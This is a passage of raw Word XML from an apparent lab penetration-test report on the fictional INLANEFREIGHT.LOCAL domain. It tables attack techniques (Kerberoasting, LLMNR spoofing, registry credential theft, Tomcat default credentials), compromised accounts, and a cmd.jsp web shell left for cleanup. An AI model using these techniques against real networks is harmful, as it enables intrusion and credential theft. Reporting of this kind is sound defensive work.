            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2084" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7BE93240" w14:textId="36EE77C5" w:rsidR="00DC2E0C" w:rsidRPr="00DC2E0C" w:rsidRDefault="00DC2E0C" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Credential Theft</w:t>
            </w:r>
            <w:r w:rsidR="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Registry)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3C39B431" w14:textId="47BB35AB" w:rsidR="00DC2E0C" w:rsidRPr="00DC2E0C" w:rsidRDefault="00DC2E0C" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain lateral movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC21AF" w:rsidRPr="0005451F" w14:paraId="44EA4DD7"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204E44BB" w14:textId="075A30C9" w:rsidR="00BC21AF" w:rsidRPr="00DC2E0C" w:rsidRDefault="00BC21AF" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.195.205 (MS01)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="481" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="75AF7606" w14:textId="7F8CFA24" w:rsidR="00BC21AF" w:rsidRPr="00DC2E0C" w:rsidRDefault="00BC21AF" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2084" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="674FB7F1" w14:textId="0D355F4F" w:rsidR="00BC21AF" w:rsidRPr="00DC2E0C" w:rsidRDefault="00BC21AF" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tomcat Manger Weak/Default Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="78508AD0" w14:textId="3D567699" w:rsidR="00BC21AF" w:rsidRPr="00DC2E0C" w:rsidRDefault="00BC21AF" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Alternate domain foothold</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC2E0C" w:rsidRPr="0005451F" w14:paraId="10AE11C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11A0153E" w14:textId="02860FE4" w:rsidR="00DC2E0C" w:rsidRPr="00DC2E0C" w:rsidRDefault="00DC2E0C" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.195.220 (SQL01)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="481" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="455BAEF5" w14:textId="2E37E5FF" w:rsidR="00DC2E0C" w:rsidRPr="00DC2E0C" w:rsidRDefault="00DC2E0C" w:rsidP="00DC2E0C">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2084" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6953D920" w14:textId="20882D81" w:rsidR="00DC2E0C" w:rsidRPr="00DC2E0C" w:rsidRDefault="00DC2E0C" w:rsidP="00ED3554">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NBT-NS/LLMNR Response Spoofing/Kerberoasting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="50BD7E96" w14:textId="18D036AB" w:rsidR="00DC2E0C" w:rsidRPr="00DC2E0C" w:rsidRDefault="00DC2E0C" w:rsidP="004539C5">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC2E0C">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial foothold</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A00EF44" w14:textId="11F7390D" w:rsidR="00390B73" w:rsidRPr="001C6D4A" w:rsidRDefault="002852E3" w:rsidP="001C6D4A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Exploitation Attempt Details</w:t>
      </w:r>
      <w:r w:rsidR="00390B73">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6B4E5D" w14:textId="706E4F23" w:rsidR="00402C9B" w:rsidRDefault="00402C9B" w:rsidP="00402C9B">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc106718135"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidR="00DC2E0C">
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Compromised Users</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="4995" w:type="pct"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1114"/>
        <w:gridCol w:w="1221"/>
        <w:gridCol w:w="5129"/>
        <w:gridCol w:w="3325"/>
      </w:tblGrid>
      <w:tr w:rsidR="00402C9B" w14:paraId="02F53D8A"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516" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="45A9FDC2" w14:textId="6FF40161" w:rsidR="00402C9B" w:rsidRPr="00D91E64" w:rsidRDefault="00402C9B" w:rsidP="00B7507B">
            <w:r>
              <w:t>Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="566" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2578C941" w14:textId="785610B2" w:rsidR="00402C9B" w:rsidRPr="00D91E64" w:rsidRDefault="00402C9B" w:rsidP="00B7507B">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2377" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="25CD8AEC" w14:textId="24DB1DBE" w:rsidR="00402C9B" w:rsidRPr="00704565" w:rsidRDefault="00402C9B" w:rsidP="00B7507B">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1541" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="59573E13" w14:textId="4951F5A0" w:rsidR="00402C9B" w:rsidRDefault="00402C9B" w:rsidP="00B7507B">
            <w:r>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00402C9B" w:rsidRPr="007369DF" w14:paraId="5732BB7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5469A6C" w14:textId="31F36C97" w:rsidR="00402C9B" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="566" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="509ED90F" w14:textId="1E8BB8F2" w:rsidR="00402C9B" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2377" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="78F9EB4A" w14:textId="748163BE" w:rsidR="00402C9B" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>NBT-NS/LLMNR Response Spoofing/Kerberoasting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1541" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="26C463BB" w14:textId="6176701B" w:rsidR="00402C9B" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Standard Domain User</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00402C9B" w:rsidRPr="0005451F" w14:paraId="3C53105E"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504FEAAD" w14:textId="3E9DD55A" w:rsidR="00402C9B" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ssqlsvc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="566" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="24EACC23" w14:textId="2371F92C" w:rsidR="00402C9B" w:rsidRPr="00045380" w:rsidRDefault="00402C9B" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2377" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5EA613A9" w14:textId="58E0EC85" w:rsidR="00402C9B" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Kerberoasting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1541" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="244D1609" w14:textId="0DA54F1A" w:rsidR="00402C9B" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Local admin on SQL01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00045380" w:rsidRPr="0005451F" w14:paraId="250752C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B8D1D3A" w14:textId="78B7C806" w:rsidR="00045380" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>rvadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="566" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0FA6F4BE" w14:textId="4AF67610" w:rsidR="00045380" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2377" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1307D91E" w14:textId="5EDBA768" w:rsidR="00045380" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Credential Theft (Registry)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1541" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2F21214D" w14:textId="6FB05E03" w:rsidR="00045380" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Local admin on all servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00045380" w:rsidRPr="0005451F" w14:paraId="1E1C0613"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29BD66A2" w14:textId="2C62ECD1" w:rsidR="00045380" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ramirez</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="566" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="62170E8B" w14:textId="0B8139D8" w:rsidR="00045380" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2377" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2995E575" w14:textId="6B1B65B5" w:rsidR="00045380" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="00045380">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Credential Theft (Kerberos TGT Ticket)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1541" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="76906FC0" w14:textId="25299A38" w:rsidR="00045380" w:rsidRPr="00045380" w:rsidRDefault="00045380" w:rsidP="004539C5">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00045380">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Sysadmin with DCSync rights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B0492CD" w14:textId="6867743E" w:rsidR="00402C9B" w:rsidRDefault="002852E3" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: User Accounts Compromised</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69701792" w14:textId="77777777" w:rsidR="00390B73" w:rsidRDefault="00390B73">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E54D1B" w14:textId="4B4D34A3" w:rsidR="00935ECE" w:rsidRDefault="00DC2E0C" w:rsidP="00935ECE">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc106718136"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Appendix D</w:t>
      </w:r>
      <w:r w:rsidR="00BC2D06">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00935ECE">
        <w:t>– Changes/Host Cleanup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5019" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1903"/>
        <w:gridCol w:w="1169"/>
        <w:gridCol w:w="7769"/>
      </w:tblGrid>
      <w:tr w:rsidR="00935ECE" w14:paraId="3967A3E8"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878" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="51CBC35F" w14:textId="119530C1" w:rsidR="00935ECE" w:rsidRPr="00D91E64" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:r>
              <w:t>Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="539" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1113070E" w14:textId="32FC31A4" w:rsidR="00935ECE" w:rsidRPr="00D91E64" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:r>
              <w:t>Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3583" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="22025B03" w14:textId="7D9B7218" w:rsidR="00935ECE" w:rsidRPr="00704565" w:rsidRDefault="00935ECE" w:rsidP="00B7507B">
            <w:r>
              <w:t>Change/Cleanup needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F43E55" w:rsidRPr="007369DF" w14:paraId="31F7DEA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878" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5807DABD" w14:textId="2A133381" w:rsidR="00F43E55" w:rsidRPr="00706631" w:rsidRDefault="00706631" w:rsidP="00706631">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00706631">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.195.205 (MS01)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="539" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="405F6E3C" w14:textId="44566B2E" w:rsidR="00F43E55" w:rsidRPr="00706631" w:rsidRDefault="00706631" w:rsidP="00706631">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00706631">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3583" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2814CB04" w14:textId="7E55D9A4" w:rsidR="00F43E55" w:rsidRPr="00706631" w:rsidRDefault="00706631" w:rsidP="00706631">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00706631">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>WAR file in C:\Program Files (x86)\Apache Software Foundation\Tomcat 10.0\webapps | deploymenttest.war | md5sum: db7d6def7d80b8e982f3359875ea54e3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00706631" w:rsidRPr="0005451F" w14:paraId="3875B478"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878" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0D26A0B1" w14:textId="4F9A45C7" w:rsidR="00706631" w:rsidRPr="00706631" w:rsidRDefault="00706631" w:rsidP="00706631">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00706631">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>192.168.195.205 (MS01)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="539" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1DEF53DC" w14:textId="2D5FA7B8" w:rsidR="00706631" w:rsidRPr="00706631" w:rsidRDefault="00706631" w:rsidP="00706631">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00706631">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Internal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3583" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0170E330" w14:textId="13207E79" w:rsidR="00706631" w:rsidRPr="00706631" w:rsidRDefault="00706631" w:rsidP="004539C5">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>JSP</w:t>
            </w:r>
            <w:r w:rsidRPr="00706631">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> file in C:\Program Files (x86)\Apache Software Foundation\Tomcat 10.0\webapps</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:r w:rsidRPr="00706631">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> deploymenttest | </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cmd.jsp</w:t>
            </w:r>
            <w:r w:rsidRPr="00706631">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> | md5sum: 5391c4a8af1ede757ba9d28865e75853</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AFD35F9" w14:textId="17402839" w:rsidR="00402C9B" w:rsidRDefault="002852E3" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Assessment Artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175FA493" w14:textId="77777777" w:rsidR="00935ECE" w:rsidRDefault="00935ECE" w:rsidP="00402C9B">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B39638F" w14:textId="77777777" w:rsidR="00935ECE" w:rsidRDefault="00935ECE" w:rsidP="00402C9B">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73AD3BB7" w14:textId="77777777" w:rsidR="00935ECE" w:rsidRDefault="00935ECE" w:rsidP="00402C9B">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136AD0C8" w14:textId="77777777" w:rsidR="00390B73" w:rsidRDefault="00390B73">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC8D0D0" w14:textId="6BE93F0F" w:rsidR="00402C9B" w:rsidRDefault="00390B73" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc106718137"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidR="00DC2E0C">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00402C9B">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="000E0FD7">
        <w:t>INLANEFREIGHT.LOCAL</w:t>
      </w:r>
      <w:r w:rsidR="00402C9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC2D06">
        <w:t xml:space="preserve">Domain </w:t>
      </w:r>
      <w:r w:rsidR="00402C9B">
        <w:t xml:space="preserve">Password </w:t>
      </w:r>
      <w:r>
        <w:t>Review</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="3E56406A" w14:textId="45959B14" w:rsidR="00935ECE" w:rsidRDefault="00935ECE" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="HTBheading3"/>
      </w:pPr>
